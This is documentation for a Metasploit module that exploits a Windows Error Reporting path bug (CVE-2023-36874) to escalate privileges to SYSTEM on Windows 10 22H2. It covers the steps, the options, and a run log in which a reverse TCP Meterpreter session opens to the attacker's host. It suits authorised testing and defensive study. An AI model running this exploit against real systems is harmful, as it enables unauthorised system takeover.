## Vulnerable Application
This module works only on Windows 10x64 22H2

### Introduction

This module takes advantage of a bug in the way Windows error reporting opens the report
parser.  If you open a report, Windows uses a relative path to locate the rendering program.
By creating a specific alternate directory structure, we can coerce Windows into opening an
arbitrary executable as SYSTEM.
If the current user is a local admin, the system will attempt impersonation and the exploit will
fail.  Because the payload is added to a directory this module creates, in the event of successful
exploitation, the user will need to delete the payload and the directories containing the payload
manually.

This module will attempt to delete the payload it uploads and the directory structure.

## Installation Instructions
1. Install Windows 10x64 22H2
1. Create a standard user


## Verification Steps

1. Create a session on the target system under the context of a non local administrative user.
1. Begin interacting with the module: `use exploit/windows/local/win_error_cve_2023_36874`.
1. Set the `PAYLOAD` and configure it correctly.
1. If an existing handler is configured to receive the elevated session, then the module's
   handler should be disabled: `set DisablePayloadHandler true`.
1. Make sure that the `SESSION` value is set to the existing session identifier.
1. Invoke the module: `run`.


## Options

### EXPLOIT_NAME

The filename to use for the exploit binary (%RAND%.exe by default)

### REPORT_DIR

The Error Directory to use (%RAND% by default).

### REPORT_NAME

The Error report name (%RAND% by default).

### SHADOW_DRIVE

Directory to place in the home drive for pivot (%TEMP% by default).

### EXECUTE_DELAY

The number of seconds to delay between file upload and exploit launch.  Default is 3.

## Scenarios

### Windows 10.0.19045.2006 x64 (Windows 10x64 22H2)

```
msf6 exploit(windows/local/win_error_cve_2023_36874) > run

[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] OS version: Windows 10+ Build 19045
[+] The target appears to be vulnerable.
[*] Shadow Path = C:\NpIWBsCJozK
[*] Attempting to PrivEsc on DESKTOP-V413087 via session ID: 1
[*] C:\ProgramData
[*] Creating C:\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport
[*] Creating directory C:\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport
[*] C:\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport created
[*] Writing Report to C:\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport\Report.wer
[*] Creating directory C:\NpIWBsCJozK
[*] C:\NpIWBsCJozK created
[*] Creating directory C:\NpIWBsCJozK\ProgramData\
[*] C:\NpIWBsCJozK\ProgramData\ created
[*] Creating directory C:\NpIWBsCJozK\ProgramData\Microsoft\
[*] C:\NpIWBsCJozK\ProgramData\Microsoft\ created
[*] Creating directory C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\
[*] C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\ created
[*] Creating directory C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\
[*] C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ created
[*] Creating directory C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ReportArchive\
[*] C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ReportArchive\ created
[*] Creating directory C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport
[*] C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport created
[*] Writing bad Report to C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport\Report.wer
[*] Creating C:\NpIWBsCJozK\system32
[*] Creating directory C:\NpIWBsCJozK\system32
[*] C:\NpIWBsCJozK\system32 created
[*] Writing payload to C:\NpIWBsCJozK\system32\wermgr.exe
[*] shadow_path = NpIWBsCJozK
[*] Exploit uploaded on DESKTOP-V413087 to C:\NpIWBsCJozK\fShpLfYh.exe
[*] Sending stage (200774 bytes) to 10.5.132.118
[+] Deleted C:\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport
[*] 
[+] Deleted C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ReportArchive\
[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.132.118:62415) at 2023-09-19 15:43:02 -0500
[-] Failed to delete C:\NpIWBsCJozK\system32: stdapi_fs_delete_dir: Operation failed: The directory is not empty.

meterpreter > sysinfo
Computer        : DESKTOP-V413087
OS              : Windows 10 (10.0 Build 19045).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 4
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > exit

```
